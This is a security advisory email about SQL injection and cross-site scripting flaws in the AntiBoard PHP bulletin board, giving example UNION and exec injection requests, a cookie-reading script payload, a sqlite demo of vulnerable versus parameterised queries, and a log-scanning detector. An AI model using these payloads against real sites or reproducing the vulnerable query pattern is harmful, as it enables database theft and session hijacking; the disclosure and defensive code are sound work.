Date: 1 Aug 2004 14:01:08 +0200
From: SecuriTeam <[email protected]>
To: [email protected]
Subject: [UNIX] AntiBoard SQL Injection and Cross Site Scripting Vulnerabilities
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
AntiBoard SQL Injection and Cross Site Scripting Vulnerabilities
------------------------------------------------------------------------
SUMMARY
"AntiBoard is a small and compact multi-threaded bulletin board/message board system written in PHP. It uses either MySQL or PostgreSQL as the database backend, and has support for different languages. It is not meant as the end all be all of bulletin boards, but rather something to easily integrate into your own page." (<http://freshmeat.net/redir/antiboard/20085/url_homepage/antiboard_info.php>)
AntiBoard is vulnerable to the two most classic vulnerabilities of dynamic
web applications: cross site scripting and SQL injection.
DETAILS
Vulnerable Systems:
* AntiBoard version 0.7.2 and prior
The antiboard.php main script is vulnerable through its 'thread_id' and
its 'parent_id' parameters. Thus, using a crafted HTTP GET query, an
attacker is able to send SQL commands to the backend database server.
Examples for SQL injection using UNION queries:
/antiboard.php?thread_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=threaded&sort_order=
/antiboard.php?range=all&mode=threaded&thread_id=1&reply=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever--
/antiboard.php?range=all&thread_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&sort_order=ASC&mode=threaded
/antiboard.php?thread_id=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=nested&reply=1
It is also possible to conduct a stored procedure attack through the use
of HTTP POST, in the following manner:
POST antiboard.php
poster_name=1111&poster_email=1111&message_title=1111&message_body=1111&
submit=Submit%2bmessage&thread_id=3&mode=1';%20exec%20whatever--&range=&
parent_id=0&reply=reply
And SQL injections through the use of HTTP POST:
POST antiboard.php
poster_name=1111&poster_email=1111&message_title=1111&message_body=1111&
submit=Submit%2bmessage&thread_id=3&mode=threaded&range=&parent_id=1%20UNION ALL select field from antiboard_emails----&reply=reply
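Every request above has the same root cause: 'thread_id' and 'parent_id' reach the SQL text without being validated or bound as parameters, so a value of the form "1 UNION ALL select ..." is parsed by the database as part of the statement. The following Python script is an added illustration written for this advisory, not AntiBoard's own code. It uses an in-memory sqlite3 database as a stand-in for the MySQL/PostgreSQL backend; the table antiboard_messages and all column names are assumptions (antiboard_emails is the table named in the POST example above). It places the vulnerable query pattern next to a hardened version that whitelists the value as a positive integer and binds it as a query parameter.

```python
import re
import sqlite3

# Constructed in-memory stand-in for AntiBoard's MySQL/PostgreSQL backend.
# The table name antiboard_messages and all column names are assumptions;
# antiboard_emails is the table the advisory's POST example targets.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE antiboard_messages (thread_id INTEGER, parent_id INTEGER, message_title TEXT);
        INSERT INTO antiboard_messages VALUES (1, 0, 'first post');
        INSERT INTO antiboard_messages VALUES (1, 1, 'a reply');
        INSERT INTO antiboard_messages VALUES (2, 0, 'other thread');
        CREATE TABLE antiboard_emails (poster_email TEXT);
        INSERT INTO antiboard_emails VALUES ('alice@example.invalid');
        INSERT INTO antiboard_emails VALUES ('bob@example.invalid');
    """)
    return db

# The shape of payload shown in the advisory, as the value of thread_id.
UNION_PAYLOAD = "1 UNION ALL SELECT poster_email FROM antiboard_emails--"

def titles_vulnerable(db, thread_id):
    """Reproduces the flaw the advisory describes: the request parameter is
    pasted into the SQL text, so a UNION payload is executed as SQL."""
    sql = "SELECT message_title FROM antiboard_messages WHERE thread_id = %s" % thread_id
    return [row[0] for row in db.execute(sql)]

def titles_hardened(db, thread_id):
    """Two independent defences: reject anything that is not a positive integer,
    and bind the value as a parameter so the database never parses it as SQL."""
    if not re.fullmatch(r"[1-9][0-9]*", str(thread_id)):
        raise ValueError("thread_id must be a positive integer")
    sql = "SELECT message_title FROM antiboard_messages WHERE thread_id = ?"
    return [row[0] for row in db.execute(sql, (int(thread_id),))]

def demo():
    """Run both versions against a normal value and against the payload."""
    db = make_db()
    result = {
        "vulnerable_normal": titles_vulnerable(db, "1"),
        "vulnerable_payload": titles_vulnerable(db, UNION_PAYLOAD),
        "hardened_normal": titles_hardened(db, "1"),
    }
    try:
        titles_hardened(db, UNION_PAYLOAD)
        result["hardened_payload"] = "executed"
    except ValueError as exc:
        result["hardened_payload"] = "rejected: %s" % exc
    return result

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

Running the script shows the vulnerable query returning rows from antiboard_emails alongside the thread titles, while the hardened version refuses the same value before it reaches the database. The integer check alone would already stop these particular payloads, but the parameter binding is the defence that holds even for string parameters such as 'mode', which the POST example shows being injected with a quote character.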
In addition to the SQL injection vulnerabilities, AntiBoard is also
vulnerable to XSS attacks which facilitate the execution of script code in
the client side of a victim accessing the site. One possible XSS attack
point is by the following HTTP request (others probably exist):
http:///antiboard.php?thread_id=1&mode=threaded&range=&feedback=<script>alert(document.cookie);</script>
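Because the vendor has no fix planned, an operator running AntiBoard is left with detection and output encoding. The Python script below is an added example written for this advisory, not code from AntiBoard or SecuriTeam. It scans constructed Apache-style access log lines (client addresses, timestamps and sizes are made up; the request targets are modelled on the ones in this advisory) for non-numeric 'thread_id'/'parent_id' values, SQL keywords in any parameter, and script tags in 'feedback', and it shows the HTML encoding that the feedback parameter should receive before being written back into the page.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style access log lines modelled on the requests in the
# advisory; client addresses, timestamps and sizes are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2004:14:01:08 +0200] "GET /antiboard.php?thread_id=1&mode=threaded&range= HTTP/1.0" 200 512
10.0.0.9 - - [01/Aug/2004:14:02:11 +0200] "GET /antiboard.php?thread_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=threaded&sort_order= HTTP/1.0" 200 2048
10.0.0.9 - - [01/Aug/2004:14:02:40 +0200] "GET /antiboard.php?thread_id=1&mode=threaded&range=&feedback=%3Cscript%3Ealert(document.cookie)%3B%3C/script%3E HTTP/1.0" 200 640
10.0.0.7 - - [01/Aug/2004:14:03:02 +0200] "GET /antiboard.php?thread_id=12&parent_id=3&mode=nested&reply=1 HTTP/1.0" 200 700
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)

# Parameters the advisory says reach the SQL layer as numbers.
NUMERIC_PARAMS = ("thread_id", "parent_id")
SQL_KEYWORDS = re.compile(r"\b(union|select|exec)\b|--", re.IGNORECASE)
SCRIPT_TAG = re.compile(r"<\s*script", re.IGNORECASE)

def classify(target):
    """Return a list of findings for one request target (path plus query)."""
    findings = []
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in query.items():
        for value in values:  # parse_qs has already percent-decoded the value
            if name in NUMERIC_PARAMS and not value.isdigit():
                findings.append("non-numeric %s" % name)
            if SQL_KEYWORDS.search(value):
                findings.append("sql keywords in %s" % name)
            if SCRIPT_TAG.search(value):
                findings.append("script tag in %s" % name)
    return findings

def scan(log_text):
    """Return (ip, target, findings) for every log line that has a finding."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("target"), findings))
    return hits

def render_feedback(feedback):
    """The fix for the reflected XSS: HTML-encode the parameter before it is
    written into the page, so a <script> tag is shown as text, not executed."""
    return '<p class="feedback">%s</p>' % html.escape(feedback, quote=True)

if __name__ == "__main__":
    for ip, target, findings in scan(SAMPLE_LOG):
        print(ip, target, ", ".join(findings))
    print(render_feedback("<script>alert(document.cookie);</script>"))
```

The scanner decodes the query string before matching, so the percent-encoded form in the log and the literal form shown in the advisory are treated alike. The keyword list is deliberately short and will not catch every encoding trick; the stronger signal for this application is the "non-numeric thread_id/parent_id" check, because those two parameters have no legitimate non-integer values at all.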
Vendor Status:
The vendor was informed of the issues on the 28th of July; however, no fix
is planned in the near future.
ADDITIONAL INFORMATION
The information has been provided by Josh Gilmour <mailto:[email protected]>.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.